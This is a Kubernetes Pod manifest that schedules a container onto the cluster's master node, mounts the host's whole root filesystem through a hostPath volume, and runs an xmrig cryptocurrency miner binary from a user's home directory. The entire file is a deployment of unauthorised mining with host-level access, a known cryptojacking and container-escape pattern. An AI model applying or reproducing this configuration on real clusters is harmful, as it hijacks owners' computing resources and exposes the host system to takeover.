apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-master
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - master
  containers:
  - name: xmrig-container-master
    image: busybox
    command:
    - /home/manager/xmrig/build/xmrig
    volumeMounts:
    - name: xmrig-volume-m
      mountPath: /
  volumes:
  - name: xmrig-volume-m
    hostPath:
      path: /
